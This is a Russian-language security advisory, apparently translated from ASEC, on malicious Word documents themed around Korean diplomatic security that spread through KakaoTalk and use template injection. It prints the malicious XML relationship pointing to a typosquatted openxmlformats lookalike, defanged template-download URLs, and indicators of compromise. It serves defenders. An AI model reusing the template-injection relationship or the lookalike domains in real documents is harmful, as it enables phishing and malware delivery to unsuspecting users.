Недавно был зафиксирован случай распространения через определенные пути (например, групповые чаты KakaoTalk) вредоносного ПО, замаскированного под документ Word.
Группа анализа ASEC обнаружила в процессе дополнительного мониторинга, что URL, используемый в поддельных документах Word, очень ловко маскируется под обычный URL, и мы хотим посоветовать пользователям проявлять осторожность.
В настоящее время идентифицированные имена файлов вредоносных документов Word выглядят следующим образом.
Настоящие имена корейцев, встречающиеся в названиях файлов, были удалены (○○○○), но важно отметить, что это были имена специалистов в области дипломатической безопасности, и названия файлов были связаны с Северной Кореей, Китаем, опросами или дипломатической безопасностью.
- International Legal Review of the Northern Limit Line (NLL) Issue and.docx
- Implications and Prospects of Xi Jinping’s Third Term.docx
- National Security Organizations.docx
- NK, Unprecedented Offensive and Provocative Survey.docx
- ○○○, RIES_Issue Insight_Vol.33, Xi Jinping’s Third Term Begins – Where Is China Headed.docx
- (Debate2_Reference-1)Chip_4Alliance and Korea’s Choice (○○○ contribution).docx
- (Debate2_Reference-2)Chip_4Alliance and Foreign Policy.docx
- (World Korean) Implications and Future Prospects of Xi Jinping’s Third Term.docx
- Fashion and Human Rights Survey.docx
Все вышеперечисленные файлы являются документами Word в формате OOXML (Office Open XML). и в атаке использовалась функция Template Injection. Следующий XML-код показывает настройки.sml.rels файла в конкретном документе Word.
1 2 3 4 | <?xml version="1.0" encoding="UTF-8" standalone="yes" <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxp://schemas.openxmlformat[.]org/officeDocument/2006/relationships/o/word officeid=NPW5D●●●DBS3V" TargetMode="External"/></Relationships> |
Примечательно, что адрес, используемый для внешнего URL, стал очень похож на обычный URL. Изучив корневую доменную зону следующего URL, можно увидеть, что он был тщательно замаскирован путем замены одного символа в openxmlformats.org на openxmlformat[.]org.
Нормальный URL: http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate
Вредоносный URL: hxxp://schemas.openxmlformat[.]org/officeDocument/2006/relationships/o/word?officeid=NPW5D●●●DBS3V
Кроме того, было установлено, что в атаках использовались следующие форматы URL, и мы видим, что они были ловко замаскированы до такой степени, что пользователи могут легко спутать вредоносные домены с обычными доменами, такими как ms-office[.]services / ms-offices[.]com / offices.word-template[.]net.
hxxps://ms-office[.]services/templates-for-word/download?id=79B9●●●I9RWT
hxxps://ms-office[.]services/templates-for-word/download?id=V2BX●●●●WE1A
hxxps://ms-office[.]services/templates-for-word/download?id=I5I2●●●●MGW
hxxps://ms-office[.]services/templates-for-word/download?id=EFHO●●●●5UCV
hxxps://ms-offices[.]com/templates-for-word/download?id=ZQ9H●●●●YP8G
hxxps://ms-offices[.]com/templates-for-word/download?id=AL03●●●KZ2
hxxps://ms-offices[.]com/templates-for-word/download?id=DTF●●●SE6
hxxp://offices.word-template[.]net/office/template?view=GYIJ●●●●0D4E
Свойства некоторых из собранных файлов Word показали, что они были созданы и распространены беспорядочно в течение нескольких дней с небольшими интервалами.
Пользователи должны обновить V3 до последней версии и воздержаться от открытия файлов документов из неизвестных источников.
Кроме того, учитывая, что вредоносные документы в настоящее время распространяются без разбора, пользователям рекомендуется уточнять у отправителя файла информацию о его передаче, даже если файл был переслан от надежного пользователя.
Indicators of Compromise
URLs
- https://ms-office.services
- https://ms-offices.com
- http://offices.word-template.net
- http://schemas.openxmlformat.org
MD5
- d698fccf14f670595442155395f42642